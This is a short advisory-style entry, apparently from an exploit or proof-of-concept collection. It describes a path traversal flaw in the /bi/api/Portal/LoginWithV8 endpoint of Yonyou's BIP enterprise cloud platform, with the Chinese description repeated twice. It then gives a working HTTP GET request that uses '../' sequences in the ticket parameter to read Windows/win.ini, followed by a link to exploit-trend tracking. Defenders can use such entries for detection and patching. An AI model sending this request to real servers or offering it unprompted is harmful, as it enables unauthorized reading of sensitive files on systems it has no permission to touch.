Description
用友Bip是用友旗下的企业级云服务平台,其/bi/api/Portal/LoginWithV8接口存在路径穿越漏洞。攻击者可通过构造包含目录遍历字符的请求,读取服务器上的任意敏感文件(如Windows/win.ini、Windows/System32/drivers/etc/hosts等),导致服务器敏感信息泄露。
用友Bip是用友旗下的企业级云服务平台,其/bi/api/Portal/LoginWithV8接口存在路径穿越漏洞。攻击者可通过构造包含目录遍历字符的请求,读取服务器上的任意敏感文件(如Windows/win.ini、Windows/System32/drivers/etc/hosts等),导致服务器敏感信息泄露。
GET /bi/api/Portal/LoginWithV8/?ticket=/../../../../Windows/win.ini HTTP/1.1
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.